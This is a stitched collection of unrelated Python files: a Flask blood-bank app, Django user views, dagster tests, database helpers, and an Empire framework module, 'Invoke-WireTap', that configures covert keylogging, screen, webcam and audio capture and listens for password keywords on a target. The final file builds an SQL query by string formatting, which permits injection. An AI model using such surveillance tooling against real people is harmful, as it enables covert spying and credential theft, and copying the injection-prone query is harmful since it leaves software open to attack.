insert_query(conn,cursor,(Id,0),columns_6,table_name6)
else:
for x in data_disease:
insert_query(conn, cursor, x, columns_6, table_name6)
for x in data_addr:
insert_query(conn, cursor,x, columns_3,table_name3)
for x in data_contact:
insert_query(conn,cursor,x, columns_4, table_name4)
for x in data_email:
insert_query(conn,cursor,x,columns_2,table_name2)
for x in data_bank:
insert_query(conn, cursor,x, columns_5, table_name5)
return render_template('return.html', myvar= 'insert', ID=Id)
# get the input. we need to put in big SQL queries to insert in each of the normalized tables.
########################################################################################################### Insert a bank
@app.route("/InsertBank", methods=['POST'])
def InsertBank():
bank_addr= request.form['inputbankaddress']
bank_city= request.form['inputCity']
query= ("SELECT IF (not exists(select {0} from {1} where {0}=1), 1,0)".format('bank_id','blood_bank'))
conn = mysql.connect()
cursor= conn.cursor()
cursor.execute(query)
conn.commit()
result= cursor.fetchone()[0]
bank_id=GetMaxID(conn,cursor,'blood_bank', 'bank_id')
return "<h1> %s </h1>" % result
query= ("INSERT INTO blood_bank (bank_id, address, city, `A+`, `A-`, `B+`, `B-`, `AB+`, `AB-`, `O+`, `O-`)"
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
)
cursor.execute(query, (bank_id,bank_addr,bank_city,0,0,0,0,0,0,0,0))
conn.commit()
return render_template('return.html', myvar='insert', ID=bank_id)
################################################################################################ Delete
@app.route("/deletegeneral/<option>", methods=['POST'])
def deletegeneral(option):
ID= request.form['ID']
conn=mysql.connect()
cursor=conn.cursor()
col_name= option[ option.find('_')+1: ]+"_id"
donor_id=get_ID(conn,cursor,"donor_bank","donor_id",col_name, ID)
print (donor_id)
acceptor_id=get_ID(conn,cursor,"acceptor_bank","acceptor_id",col_name, ID)
delete_query(conn,cursor,option,col_name, ID)
    for x in donor_id:
check= get_ID(conn,cursor,"donor_bank","bank_id","donor_id",x)
if check==():
delete_query(conn,cursor,"blood_donor", "donor_id", x)
    for x in acceptor_id:
check= get_ID(conn,cursor,"acceptor_bank","bank_id","acceptor_id",x)
if check==():
delete_query(conn,cursor,"blood_acceptor", "acceptor_id", x)
return render_template('return.html', myvar='delete', ID=ID)
@app.route("/Delete")
def delete():
return render_template('insert.html', flag='delete', redirect= '/Menu/Delete')
@app.route("/Search")
def Search():
return "<h1> IN PROGRESS</h1>"
@app.route("/Update")
def Update():
return render_template('insert.html', flag= 'Update', redirect='/Menu/Update')
@app.route("/")
def appp():
return render_template('index.html')
@app.route('/Insert')
def Insert():
return render_template('insert.html', flag='Insert', redirect='/Menu/Insert')
@app.route("/main")
def m1():
return appp()
@app.route("/show")
def show():
return data
@app.route("/Q4inter")
def Q4inter():
return render_template('query4.html')
@app.route("/Q4",methods=['POST'])
def Q4():
gender= request.form["Gender"]
blood_type= request.form["BT"]
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query4', ('%s'%gender, '%s'%blood_type))
result=cursor.fetchall()
final=[]
print(result)
if result==() or result=="":
final.append( "The Query returned an Empty Table")
else:
for x in result:
final.append(x[0])
return render_template('return.html', myvar='Query 4', list=final)
@app.route("/Q5inter")
def Q5inter():
return render_template('query5.html')
@app.route("/Q5", methods=['POST'])
def Q5():
bank_id= request.form["bankid"]
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query5A', (bank_id,))
result_min= cursor.fetchone()
final_min=[result_min[1], result_min[0]]
cursor.callproc('Query5B', (bank_id,))
result_max= cursor.fetchone()
final_max=[result_max[1], result_max[0]]
return render_template('return.html', myvar="Query 5", list=[final_min,final_max])
@app.route("/Q6")
def Q6():
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query6')
result= cursor.fetchall()
if result==() or result=="" :
result=[["The Query returned an empty table"]]
return render_template('return.html', myvar='Query 6', list= result, len= len(result[0]))
@app.route("/Q7")
def Q7():
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query7')
result= cursor.fetchall()
if result==() or result=="" :
result=[["The Query returned an empty table"]]
return render_template('return.html', myvar='Query 7', list= result, len= len(result[0]))
@app.route("/Q8")
def Q8():
conn=mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query8')
result= cursor.fetchone()
final=[result[1],result[0]]
return render_template('return.html', myvar= 'Query 8', list= final)
@app.route("/Q9")
def Q9():
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query9')
result= cursor.fetchall()
final=[]
print(result)
if result==() or result=="":
final.append( "The Query returned an Empty Table")
else:
for x in result:
final.append(x[0])
print(final)
return render_template('return.html', myvar="Query 9", list=final)
@app.route("/Q10")
def Q10():
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query10')
result= cursor.fetchone()
final=[]
print(result)
if result[0]==None or result[0]=="":
final.append( "The Query returned an Empty Table")
else:
final=list(result)
print(final)
return render_template('return.html', myvar="Query 10", list=final)
######################################################
@app.route("/Q2inter")
def Q2inter():
return render_template('query2.html')
@app.route("/Q2", methods=['POST'])
def Q2():
starting_date= request.form['startingdate']
ending_date=request.form['endingdate']
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query2', ('%s'%starting_date,'%s' % ending_date))
result= cursor.fetchall()
print(result)
final_col1="times donated"
final_col2="<NAME>"
final_col3="<NAME>"
if result==() or result=="" :
result=[["The Query returned an empty table"]]
return render_template('return.html',myvar='Query 2', list=result, len=len(result[0]))
########################################################################3
@app.route("/Q3inter")
def Q3inter():
return render_template("query3.html")
@app.route("/Q3", methods=['POST'])
def Q3():
starting_date= request.form['startingdate']
ending_date=request.form['endingdate']
conn= mysql.connect()
cursor=conn.cursor()
cursor.callproc('Query3', ('%s'%starting_date,'%s' % ending_date))
result= cursor.fetchall()
final=[]
print(result)
if result[0][0]==None or result[0][0]=="":
final.append( "The Query returned an Empty Table")
else:
for x in result:
final.append(x[0])
print(final)
return render_template('return.html', myvar="Query 3", list=final)
####################################
#Query 1
@app.route("/Q1inter")
def Q1inter():
return render_template("Q1.html")
@app.route("/Q1",methods=['POST'])
def Q1():
disease_id= request.form['D_ID']
conn= mysql.connect()
cursor= conn.cursor()
cursor.callproc('Query1',(disease_id,))
result= cursor.fetchone()[0]
return render_template('return.html', myvar= "Query 1", list=result)
#######################################
@app.route('/Menu/<option>', methods=['POST'])
def Menu(option):
resp=(request.form["options"])
if option=="Insert":
if resp=="Blood Bank":
return render_template('create_bank.html')
elif resp=="Blood Donor":
return render_template('create_donor.html', who='Donor', redirect="/InsertPerson/Donor")
elif resp=="Blood Acceptor":
return render_template('create_donor.html', who='Acceptor',redirect="/InsertPerson/Acceptor" )
elif resp=="Blood Drive":
return render_template('blood_drive.html')
elif resp=="Blood Drive Donor":
return render_template('blood_drive_donor.html')
##########################################################
elif option=="Delete":
if resp=="Blood Bank":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_bank')
elif resp=="Blood Donor":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_donor')
elif resp=="Blood Acceptor":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_acceptor' )
elif resp=="Blood Drive":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_drive')
elif resp=="Blood Drive Donor":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_drive_donor')
##########################################################33
elif option=="Update":
if resp=="Blood Bank":
return render_template('update_driveorbank.html', flag='blood bank', redirect="/InsertBank/DonorUpdate")
elif resp=="Blood Donor":
return render_template('update_person.html', who='Donor', redirect="/InsertPerson/DonorUpdate")
elif resp=="Blood Acceptor":
return render_template('update_person.html', who='Acceptor',redirect="/InsertPerson/AcceptorUpdate" )
elif resp=="Blood Drive":
return render_template('Update_driveorbank.html', flag='blood drive', redirect="/InsertDrive/DonorUpdate")
elif resp=="Blood Drive Donor":
            return render_template('Update_driveorbank.html', flag='blood drive donor', redirect="/Insert_Drive_Donor/DonorUpdate")
#####################################################################
elif option=="Search":
if resp=="Blood Bank":
return render_template('create_bank.html')
elif resp=="Blood Donor":
return render_template('create_donor.html', who='Donor', redirect="/InsertPerson/Donor")
elif resp=="Blood Acceptor":
return render_template('create_donor.html', who='Acceptor',redirect="/InsertPerson/Acceptor" )
elif resp=="Blood Drive":
return render_template('blood_drive.html')
elif resp=="Blood Drive Donor":
return render_template('blood_drive_donor.html')
if __name__ == "__main__":
#main()
app.run(debug=True)
|
StarcoderdataPython
|
1683223
|
from django.http import HttpResponseForbidden, HttpResponseBadRequest, HttpResponse, JsonResponse
from django.contrib.auth import authenticate, login, logout
from bin import functions as fn
# ===================================================================
# Users (/user)
# ===================================================================
# /users/all : return a list of all users
def users_all(request):
if not fn.auth_(request): return HttpResponseForbidden()
if not fn.access_admin_(request): return HttpResponseForbidden()
try:
all_users = fn.users_all()
return JsonResponse(all_users, safe=False)
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
# /users/new?user,password : create a new user
def user_create(request):
if request.method != "POST": return HttpResponseBadRequest()
if not fn.auth_(request): return HttpResponseForbidden()
args = fn.args_(request, ["username", "password"], get=False)
if args is None: return HttpResponseBadRequest()
try:
fn.user_create(args["username"], args["password"])
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
return JsonResponse({"result": "ok", "r": 0})
# /users/<user>/remove
def user_remove(request, user):
if request.method != "POST": return HttpResponseBadRequest()
if not fn.auth_(request): return HttpResponseForbidden()
if not fn.access_admin_(request): return HttpResponseForbidden()
try:
fn.user_remove(user)
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
return JsonResponse({"result": "ok", "r": 0})
# /users/<user>/change_password?password
def user_set_password(request, user):
if request.method != "POST": return HttpResponseBadRequest()
if not fn.auth_(request): return HttpResponseForbidden()
args = fn.args_(request, {"new_password": None, "old_password": ""})
if args is None: return HttpResponseBadRequest()
if user == "self":
try:
if authenticate(username=request.user.username, password=args["old_password"]) is None:
raise Exception("Wrong password")
fn.user_set_password(request.user.username, args["new_password"])
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
else:
if not fn.access_admin_(request): return HttpResponseForbidden()
try:
fn.user_set_password(user, args["new_password"])
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
return JsonResponse({"result": "ok", "r": 0})
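# Illustrative sketch (not part of the original project): a urls.py that could wire
# the views above into Django's URL router. The import path "views" and the URL
# patterns below are assumptions made for the example.
#
# from django.urls import path
# import views
#
# urlpatterns = [
#     path("users/all", views.users_all),
#     path("users/new", views.user_create),
#     path("users/<str:user>/remove", views.user_remove),
#     path("users/<str:user>/change_password", views.user_set_password),
# ]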
|
StarcoderdataPython
|
3276385
|
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
# Metadata info about the module, not modified during runtime
self.info = {
# Name for the module that will appear in module menus
'Name': 'Invoke-WireTap',
# List of one or more authors for the module
'Author': ['@mDoi12mdjf', '@S3cur3Th1sSh1t'],
# More verbose multi-line description of the module
'Description': ("WireTap is a .NET 4.0 project to consolidate several functions used to interact with a "
"user's hardware, including: Screenshots (Display + WebCam Imaging), Audio (Both line-in "
"and line-out), Keylogging, & Activate voice recording when the user says a keyword "
"phrase. Note: Only one method can be ran at a time."),
'Software': '',
'Techniques': ['T1123', 'T1125', 'T1056'],
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
'OutputExtension': None,
# True if the module needs admin rights to run
'NeedsAdmin': False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': True,
# The language for this module
'Language': 'powershell',
# The minimum PowerShell version needed for the module to run
'MinLanguageVersion': '4',
# List of any references/other comments
'Comments': [
'https://github.com/djhohnstein/WireTap'
]
}
# Any options needed by the module, settable during runtime
self.options = {
# Format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description': 'Agent to run on.',
'Required': True,
'Value': ''
},
'record_mic': {
'Description': 'Record audio from the attached microphone (line-in).',
'Required': False,
'Value': 'True',
},
'record_sys': {
'Description': 'Record audio from the system speakers (line-out).',
'Required': False,
'Value': '',
},
'record_audio': {
'Description': 'Record audio from both the microphone and the speakers. Default: 10s',
'Required': False,
'Value': '',
},
'capture_screen': {
'Description': "Screenshot the current user's screen.",
'Required': False,
'Value': '',
},
'capture_webcam': {
'Description': "Capture images from the user's attached webcam (if it exists).",
'Required': False,
'Value': '',
},
'keylogger': {
'Description': 'Begin logging keystrokes to a file.',
'Required': False,
'Value': '',
},
'listen_for_passwords': {
'Description': "Listens for words 'username', 'password', 'login' and 'credential', "
"and when heard, starts an audio recording for two minutes.",
'Required': False,
'Value': '',
},
'time': {
'Description': 'Time to record mic, sys, or audio. Time suffix can be s/m/h.',
'Required': False,
'Value': '10s',
},
}
self.mainMenu = mainMenu
if params:
for param in params:
# Parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# First method: Read in the source script from module_source
module_source = self.mainMenu.installPath + "/data/module_source/collection/Invoke-WireTap.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscationCommand)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(module_source)))
return ""
module_code = f.read()
f.close()
script = module_code
script_end = 'Invoke-WireTap -Command "'
# Add any arguments to the end execution of the script
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script_end += str(option)
elif option.lower() == "time":
                        # append the time value for the recording duration
script_end += " " + str(values['Value'])
else:
script_end += " " + str(option) + " " + str(values['Value'])
script_end += '"'
if obfuscate:
script_end = helpers.obfuscate(psScript=script_end, installPath=self.mainMenu.installPath,
obfuscationCommand=obfuscationCommand)
script += script_end
script = helpers.keyword_obfuscation(script)
return script
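# Illustrative sketch (not taken from Empire itself): how the framework would
# typically drive this module. "main_menu" stands in for Empire's menu object
# (anything exposing installPath), and the option values below are made up.
#
# module = Module(main_menu, params=[("Agent", "WIN10X64AGENT"), ("keylogger", "True")])
# powershell_script = module.generate(obfuscate=False)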
|
StarcoderdataPython
|
3314793
|
# 10-11
# import json
#
# number = input('\nWhat\'s your favorite number? ')
# with open('number.json', 'w') as file:
# json.dump(int(number), file)
#
# with open('number.json') as file:
# number = json.load(file)
# print("I know your favorite number! It's " + str(number) + '.')
# 10-12
# import json
#
# try:
# with open('number.json') as file:
# number = json.load(file)
# except FileNotFoundError:
# number = input('\nWhat\'s your favorite number? ')
# with open('number.json', 'w') as file:
# json.dump(int(number), file)
# else:
# print("I know your favorite number! It's " + str(number) + '.')
# 10-13
import json
def get_stored_username():
filename = 'username.json'
try:
with open(filename) as f_obj:
username = json.load(f_obj)
except FileNotFoundError:
return None
else:
return username
def get_new_username():
username = input('What is your name? ')
filename = 'username.json'
with open(filename, 'w') as f_obj:
json.dump(username, f_obj)
return username
def greet_user():
username = get_stored_username()
if username:
isRight = input("Are you " + username + '? (y/n) ')
if isRight == 'n' or isRight == 'N':
username = get_new_username()
print("We'll remember you when you come back, " + username + '!')
elif isRight == 'y' or isRight == 'Y':
print('Welcome back, ' + username + '!')
else:
print('INPUT ERROR!')
else:
username = get_new_username()
print("We'll remember you when you come back, " + username + '!')
greet_user()
|
StarcoderdataPython
|
77943
|
# pylint: disable=protected-access
import os
import re
import subprocess
import tempfile
import pytest
from dagster import AssetKey, AssetMaterialization, Output, execute_pipeline, pipeline, solid
from dagster.core.errors import DagsterInstanceMigrationRequired
from dagster.core.instance import DagsterInstance
from dagster.core.storage.tags import PARTITION_NAME_TAG, PARTITION_SET_TAG
from dagster.utils import file_relative_path
from sqlalchemy import create_engine
def test_0_7_6_postgres_pre_add_pipeline_snapshot(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(
__file__, "snapshot_0_7_6_pre_add_pipeline_snapshot/postgres/pg_dump.txt"
),
],
env=env,
)
run_id = "d5f89349-7477-4fab-913e-0925cef0a959"
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
instance = DagsterInstance.from_config(tempdir)
@solid
def noop_solid(_):
pass
@pipeline
def noop_pipeline():
noop_solid()
with pytest.raises(
DagsterInstanceMigrationRequired, match=_migration_regex("run", current_revision=None)
):
execute_pipeline(noop_pipeline, instance=instance)
# ensure migration is run
instance.upgrade()
runs = instance.get_runs()
assert len(runs) == 1
assert runs[0].run_id == run_id
run = instance.get_run_by_id(run_id)
assert run.run_id == run_id
assert run.pipeline_snapshot_id is None
result = execute_pipeline(noop_pipeline, instance=instance)
assert result.success
runs = instance.get_runs()
assert len(runs) == 2
new_run_id = result.run_id
new_run = instance.get_run_by_id(new_run_id)
assert new_run.pipeline_snapshot_id
def test_0_9_22_postgres_pre_asset_partition(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(
__file__, "snapshot_0_9_22_pre_asset_partition/postgres/pg_dump.txt"
),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
instance = DagsterInstance.from_config(tempdir)
@solid
def asset_solid(_):
yield AssetMaterialization(
asset_key=AssetKey(["path", "to", "asset"]), partition="partition_1"
)
yield Output(1)
@pipeline
def asset_pipeline():
asset_solid()
with pytest.raises(
DagsterInstanceMigrationRequired,
match=_migration_regex("run", current_revision="c9159e740d7e"),
):
execute_pipeline(asset_pipeline, instance=instance)
# ensure migration is run
instance.upgrade()
result = execute_pipeline(asset_pipeline, instance=instance)
assert result.success
def test_0_9_22_postgres_pre_run_partition(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(__file__, "snapshot_0_9_22_pre_run_partition/postgres/pg_dump.txt"),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
instance = DagsterInstance.from_config(tempdir)
@solid
def simple_solid(_):
return 1
@pipeline
def simple_pipeline():
simple_solid()
tags = {PARTITION_NAME_TAG: "my_partition", PARTITION_SET_TAG: "my_partition_set"}
with pytest.raises(
DagsterInstanceMigrationRequired,
match=_migration_regex("run", current_revision="3e0770016702"),
):
execute_pipeline(simple_pipeline, tags=tags, instance=instance)
# ensure migration is run
instance.upgrade()
result = execute_pipeline(simple_pipeline, tags=tags, instance=instance)
assert result.success
def test_0_10_0_schedule_wipe(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(__file__, "snapshot_0_10_0_wipe_schedules/postgres/pg_dump.txt"),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
with pytest.raises(DagsterInstanceMigrationRequired):
with DagsterInstance.from_config(tempdir) as instance:
instance.optimize_for_dagit(statement_timeout=500)
with DagsterInstance.from_config(tempdir) as instance:
instance.upgrade()
with DagsterInstance.from_config(tempdir) as upgraded_instance:
assert len(upgraded_instance.all_stored_job_state()) == 0
def test_0_10_6_add_bulk_actions_table(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(
__file__, "snapshot_0_10_6_add_bulk_actions_table/postgres/pg_dump.txt"
),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
with DagsterInstance.from_config(tempdir) as instance:
assert not instance.has_bulk_actions_table()
instance.upgrade()
assert instance.has_bulk_actions_table()
def _migration_regex(storage_name, current_revision, expected_revision=None):
warning = re.escape(
"Instance is out of date and must be migrated (Postgres {} storage requires migration).".format(
storage_name
)
)
if expected_revision:
revision = re.escape(
"Database is at revision {}, head is {}.".format(current_revision, expected_revision)
)
else:
revision = "Database is at revision {}, head is [a-z0-9]+.".format(current_revision)
instruction = re.escape("Please run `dagster instance migrate`.")
return "{} {} {}".format(warning, revision, instruction)
|
StarcoderdataPython
|
4804853
|
import os
import os.path
import stat
import subprocess
import sys
import pytest
@pytest.fixture
def artifact_path():
dist_dir = os.path.join(os.path.dirname(__file__), 'dist')
if not os.path.isdir(dist_dir):
raise ValueError(f"dist directory \"{dist_dir}\" does not exist")
dist_files = [dir_entry.path for dir_entry in os.scandir(dist_dir) if dir_entry.is_file()]
if len(dist_files) > 1:
raise ValueError(f"Find multiple artifacts in the \"{dist_dir}\" directory")
elif len(dist_files) == 0:
raise ValueError(f"No artifacts are found in the \"{dist_dir}\" directory")
artifact_path = dist_files[0]
artifact_mode = os.stat(artifact_path).st_mode
if not artifact_mode & stat.S_IEXEC:
os.chmod(artifact_path, artifact_mode | stat.S_IEXEC)
return artifact_path
def test_help(artifact_path):
result = subprocess.run([artifact_path, '--help'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result.check_returncode()
def test_list_ports(artifact_path):
result = subprocess.run([artifact_path, '--list'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result.check_returncode()
if __name__ == '__main__':
# check minimal python version
assert sys.version_info >= (3, 6)
sys.exit(pytest.main(args=[__file__]))
|
StarcoderdataPython
|
25439
|
<gh_stars>1-10
import sys
from flask_appbuilder import SQLA, AppBuilder, ModelView, Model
from flask_appbuilder.models.sqla.interface import SQLAInterface
from sqlalchemy import Column, Integer, String, ForeignKey, Table
from sqlalchemy.orm import relationship
from flask import Flask, redirect
from flask_appbuilder.actions import action
config = {
'SQLALCHEMY_DATABASE_URI': 'sqlite:///test.db',
'CSRF_ENABLED': True,
'SECRET_KEY': '\2\1thisismyscretkey\1\2\e\y\y\h',
'APP_NAME': 'Example of Filtering Many-to-many Relationships on a single field.'
}
app = Flask('single_filter_multi_value')
app.config.update(config)
db = SQLA(app)
appbuilder = AppBuilder(app, db.session)
program_registration = Table(
'program_registration',
Model.metadata,
Column('program_id', Integer, ForeignKey('program.id')),
Column('student_id', Integer, ForeignKey('student.id')))
course_registration = Table(
'course_registration',
Model.metadata,
Column('course_id', Integer, ForeignKey('course.id')),
Column('student_id', Integer, ForeignKey('student.id')))
class Teacher(Model):
id = Column(Integer, primary_key=True)
name = Column(String, nullable=False)
def __repr__(self):
return self.name
class Program(Model):
id = Column(Integer, primary_key=True)
name = Column(String, nullable=False)
def __repr__(self):
return self.name
class Student(Model):
id = Column(Integer, primary_key=True)
name = Column(String, nullable=False)
program = relationship(Program, secondary=program_registration,
backref='students')
def __repr__(self):
return self.name
class Course(Model):
id = Column(Integer, primary_key=True)
title = Column(String, nullable=False)
teacher_id = Column(Integer, ForeignKey('teacher.id'), nullable=False)
teacher = relationship(Teacher, backref='courses')
students = relationship(Student, secondary=course_registration,
backref='courses')
def __repr__(self):
return self.title
class CourseView(ModelView):
datamodel = SQLAInterface(Course)
list_columns = ['title', 'teacher']
show_columns = ['title', 'teacher']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
class ProgramView(ModelView):
datamodel = SQLAInterface(Program)
list_columns = ['name']
show_columns = ['name', 'students']
add_columns = ['name']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
class StudentView(ModelView):
datamodel = SQLAInterface(Student)
related_views = [CourseView, ProgramView]
list_columns = ['name', 'courses']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
class TeacherView(ModelView):
datamodel = SQLAInterface(Teacher)
related_views = [StudentView]
list_columns = ['name']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
db.create_all()
appbuilder.add_view(TeacherView, 'Teachers')
appbuilder.add_view(CourseView, 'Courses')
appbuilder.add_view(StudentView, 'Students')
appbuilder.add_view(ProgramView, 'Programs')
def add_data():
db.session.add(Program(name="Bachelor of Science IT"))
db.session.add(Program(name="Bachelor of Science Computer Science"))
mr_smith = Teacher(name='<NAME>')
db.session.add(mr_smith)
rod = Student(name='Rod')
jane = Student(name='Jane')
freddy = Student(name='Freddy')
db.session.add(rod)
db.session.add(jane)
db.session.add(freddy)
db.session.add(Course(title="Introduction to Programming using Pyhon",
teacher=mr_smith,
students=[rod, jane, freddy]))
db.session.add(Course(title="Mathematics I",
teacher=mr_smith,
students=[rod, jane]))
db.session.commit()
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == '--add_data':
add_data()
else:
app.run(debug=True)
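# Usage sketch (illustrative): seed the demo data once, then start the app.
#   python app.py --add_data
#   python app.py
# The file name "app.py" is an assumption; use whatever this module is saved as.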
|
StarcoderdataPython
|
3321630
|
<gh_stars>0
from postgres_api import conn, cur, logger
from psycopg2 import Error
from datetime import datetime
def get_last_update(project_type):
try:
select_query = "SELECT timestamp from run_logs WHERE process_type = %s ORDER BY timestamp DESC LIMIT 1"
cur.execute(select_query, (project_type,))
mobile_records = cur.fetchall()
# print(mobile_records)
logger.info("Data was successfully selected from Logs Table")
return mobile_records
except (Exception, Error) as error:
logger.error("Error while selecting from Logs Table", error)
conn.rollback()
return None
def existance_in_document_table(file_id):
try:
select_query = "SELECT doc_id from document WHERE doc_id = %s and doc_src = %s"
cur.execute(select_query, (file_id, "GDrive"))
mobile_records = cur.fetchall()
logger.info("Data was successfully selected from Document Table")
if mobile_records != []:
logger.warn("Document {0} is already exists in Documents Table".format(file_id))
return mobile_records
except (Exception, Error) as error:
logger.error("Error while selecting from Document Table", error)
conn.rollback()
return []
def existance_in_tm_current_table(file_id):
try:
select_query = "SELECT doc_id from tm_current WHERE doc_id = %s"
cur.execute(select_query, (file_id,))
mobile_records = cur.fetchall()
logger.info("Data was successfully selected from tm_current Table")
if mobile_records != []:
logger.warning("Document {0} is already exists in tm_current Table".format(file_id))
return mobile_records
except (Exception, Error) as error:
logger.error("Error while selecting from tm_current Table", error)
conn.rollback()
return []
def logs_insert(project_type):
try:
insert_query = "INSERT INTO run_logs (process_type, timestamp) VALUES (%s,%s)"
cur.execute(insert_query, (project_type, datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")))
conn.commit()
logger.info("Data was successfully inserted into Logs Table")
return True
except (Exception, Error) as error:
logger.error("Error while inserting into Logs Table", error)
conn.rollback()
return False
def insert_into_DOCUMENT(doc_name, timestamp):
try:
insert_query = "INSERT INTO document (doc_src, doc_id, timestamp) VALUES (%s,%s,%s)"
cur.execute(insert_query, ("GDrive", doc_name, timestamp))
conn.commit()
logger.info("Data was successfully inserted into Document Table")
# return True
except (Exception, Error) as error:
logger.error("Error while inserting into Documents", error)
conn.rollback()
def insert_into_TM_CURRENT(doc_name):
try:
insert_query = "INSERT INTO TM_CURRENT (doc_id, timestamp) VALUES (%s,%s)"
cur.execute(insert_query, (doc_name, datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")))
conn.commit()
# logger.info("Data was successfully insert into TM_CURRENT")
# return True
except (Exception, Error) as error:
logger.error("Error while inserting into TM_CURRENT", error)
conn.rollback()
def clear_TM_CURRENT():
try:
insert_query = "TRUNCATE tm_current"
cur.execute(insert_query)
conn.commit()
logger.info("Table TM_CURRENT was successfully cleared")
# return True
except (Exception, Error) as error:
logger.error("Error while clearing TM_CURRENT", error)
conn.rollback()
def clear_DOC_SIMILARITY():
try:
insert_query = "TRUNCATE doc_similarity"
cur.execute(insert_query)
conn.commit()
logger.info("Table DOC_SIMILARITY was successfully cleared")
# return True
except (Exception, Error) as error:
logger.error("Error while clearing DOC_SIMILARITY", error)
conn.rollback()
def insert_into_DOC_PROCESSING(proc_id, doc_id, status):
try:
insert_query = "INSERT INTO doc_processing (doc_id, process_id, status) VALUES ('{0}', '{1}', '{2}')" \
.format(doc_id, proc_id, status)
cur.execute(insert_query)
conn.commit()
logger.info("Data was successfully inserted into DOC_PROCESSING Table")
except (Exception, Error) as error:
logger.error("Error while inserting into DOC_PROCESSING", error)
conn.rollback()
